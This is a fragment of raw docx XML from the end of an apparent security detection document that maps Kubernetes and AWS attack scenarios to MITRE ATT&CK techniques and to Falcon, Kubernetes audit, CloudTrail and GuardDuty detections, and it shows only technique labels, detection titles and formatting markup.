              <w:t xml:space="preserve">S5</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T1609</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Container Administration Command</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Execution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3: Privileged DaemonSet Pod Running on Every Node</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5B2D8E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S5</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T1136.003</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Create Cloud Account</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Persistence</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4: Attempt to Disable Falcon Sensor (Defense Evasion)</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5B2D8E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">S5</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urier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.001</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Disable or Modify Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion</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Detection 5: New IAM User Created from EC2 Instance Profile (Post-Escape)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F5C9E" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">END OF DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Scenarios | 25 MITRE Techniques | 25 Detections | Falcon + K8s Audit + CloudTrail + GuardDuty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F5C9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2026-02-25T06:01:07.604Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-25T06:01:07.605Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>